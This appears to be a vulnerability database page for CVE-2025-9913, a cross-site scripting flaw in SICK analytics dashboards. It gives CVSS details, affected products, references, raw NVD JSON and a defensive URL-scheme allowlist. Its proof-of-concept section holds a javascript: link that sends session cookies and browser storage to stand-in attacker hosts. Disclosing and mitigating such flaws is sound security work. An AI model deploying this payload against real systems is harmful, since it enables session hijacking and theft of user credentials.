Security Vulnerability Report
CVE-2025-9913 CVSS 4.5 MEDIUM

CVE-2025-9913

Published: 2025-10-06 07:15:36
Last Modified: 2026-01-29 01:55:44

Description

JavaScript can be run inside the address bar via the dashboard "Open in new Tab" button, making the application vulnerable to session hijacking.

CVSS Details

CVSS Score
4.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
Weakness
CWE-79 (Cross-site Scripting)

Note: the score above is the vendor-supplied (Secondary) rating, which assumes the attacker already holds high privileges (PR:H). The NVD Primary rating in the raw record below is CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, base score 6.1 MEDIUM, i.e. no privileges required and scope changed. Which one applies depends on who can place links that the dashboard offers to open in a new tab.

Configurations (Affected Products)

cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:* - VULNERABLE
SICK products listed above (for the exact affected versions, refer to the official SICK CSAF advisory sca-2025-0010).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CVE-2025-9913 PoC: JavaScript Injection via Dashboard "Open in new Tab" Button -->
<!-- This PoC demonstrates how a javascript: URI can be injected through the dashboard's "Open in new Tab" functionality -->

<!-- Malicious link that exploits the vulnerability when clicked via "Open in new Tab" -->
<a href="javascript:void((function(){
  /* Steal session cookie and send to attacker server */
  var sessionData = document.cookie;
  var img = new Image();
  img.src = 'https://attacker-server.com/steal?data=' + encodeURIComponent(sessionData);
  /* Also steal localStorage/sessionStorage tokens */
  var localData = JSON.stringify({
    localStorage: localStorage,
    sessionStorage: sessionStorage,
    cookies: document.cookie
  });
  /* Exfiltrate via fetch */
  fetch('https://attacker-server.com/exfil', {
    method: 'POST',
    body: localData,
    headers: {'Content-Type': 'application/json'}
  });
})())">
  Click to Open Dashboard
</a>

<!-- Alternative: Direct javascript: payload for address bar execution -->
<!-- javascript:void(document.location='https://attacker.com/steal?c='+document.cookie) -->

<!--
  Attack Flow:
  1. Attacker with high privileges crafts malicious javascript: URI
  2. Victim clicks "Open in new Tab" on dashboard
  3. JavaScript executes in the context of the dashboard application
  4. Session cookies/tokens are exfiltrated to attacker's server
  5. Attacker uses stolen session to hijack victim's session
-->
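The root cause described above is a link target that the dashboard hands to the browser without checking its scheme. The following is an added example of the defender-side check, not code from SICK or from the advisory: it parses the candidate link with the WHATWG URL constructor, resolves relative links against an assumed dashboard origin (`https://dashboard.example/`), and only allows `http:`/`https:` through. Every other scheme (`javascript:`, `data:`, `vbscript:`, ...) is refused before anything reaches `window.open`. The sample links at the bottom are constructed for illustration.

```javascript
// Added example (not the advisory's or the vendor's code): scheme allowlist for
// links a dashboard opens in a new tab. The URL parser normalises the input
// (strips leading/trailing whitespace and control characters, lower-cases the
// scheme), so "  JaVaScRiPt:alert(1)" is classified the same as "javascript:".

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Assumed origin of the dashboard; used only to resolve relative links.
const DASHBOARD_BASE = 'https://dashboard.example/';

// Returns the normalised absolute URL if `raw` is safe to open, otherwise null.
function safeHrefForNewTab(raw, base = DASHBOARD_BASE) {
  if (typeof raw !== 'string') return null;
  let url;
  try {
    url = new URL(raw, base);
  } catch (e) {
    return null; // unparsable input is never opened
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  return url.href;
}

// Handler for the "Open in new Tab" action. It never assigns the raw string to
// window.open or to an anchor's href; only the validated URL is used.
// Returns true if a tab was opened, false if the link was blocked.
function openInNewTab(raw) {
  const href = safeHrefForNewTab(raw);
  if (href === null) {
    // In a real application, log the rejected value for detection purposes.
    return false;
  }
  // 'noopener' severs window.opener so the new tab cannot reach back into the
  // dashboard; 'noreferrer' keeps the dashboard URL out of the Referer header.
  if (typeof window !== 'undefined') {
    window.open(href, '_blank', 'noopener,noreferrer');
  }
  return true;
}

// Constructed sample link values a dashboard widget might be asked to open.
const SAMPLE_LINKS = [
  'https://example.com/report/42',        // absolute https: allowed
  '/dashboard/panel/7',                   // relative, resolved against base: allowed
  'javascript:alert(document.domain)',    // script URI: blocked
  '  JaVaScRiPt:alert(1)',                // mixed case + leading spaces: blocked
  'data:text/html,<b>x</b>',              // data: URI: blocked
];

// Classifies each sample; handy for a unit test or a quick audit of stored links.
function classifySamples() {
  return SAMPLE_LINKS.map((link) => ({
    link,
    allowed: safeHrefForNewTab(link) !== null,
  }));
}

module.exports = { safeHrefForNewTab, openInNewTab, classifySamples, SAMPLE_LINKS };
```

The same check should run on the server when a link is stored, not only in the browser at click time, so that an operator with dashboard-editing rights cannot persist a `javascript:` target that a later, less-privileged viewer will open.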

References

https://sick.com/psirt (Vendor Advisory)
https://www.cisa.gov/resources-tools/resources/ics-recommended-practices (US Government Resource)
https://www.first.org/cvss/calculator/3.1 (Not Applicable)
https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json (Vendor Advisory)
https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf (Vendor Advisory)
https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9913", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:36.200", "lastModified": "2026-01-29T01:55:44.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "JavaScript can be ran inside the address bar via the dashboard \"Open in new Tab\" Button, making the application vulnerable to session hijacking."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "E62416BA-1BF1-43BD-98B2-57BD34128419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "27031959-2981-4755-9E3D-02CD083F2B72"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "5955214B-0D71-449A-BFD4-8804FDF91CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "86C0BA69-E701-45A3-ADA5-130B8AD9DF15"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}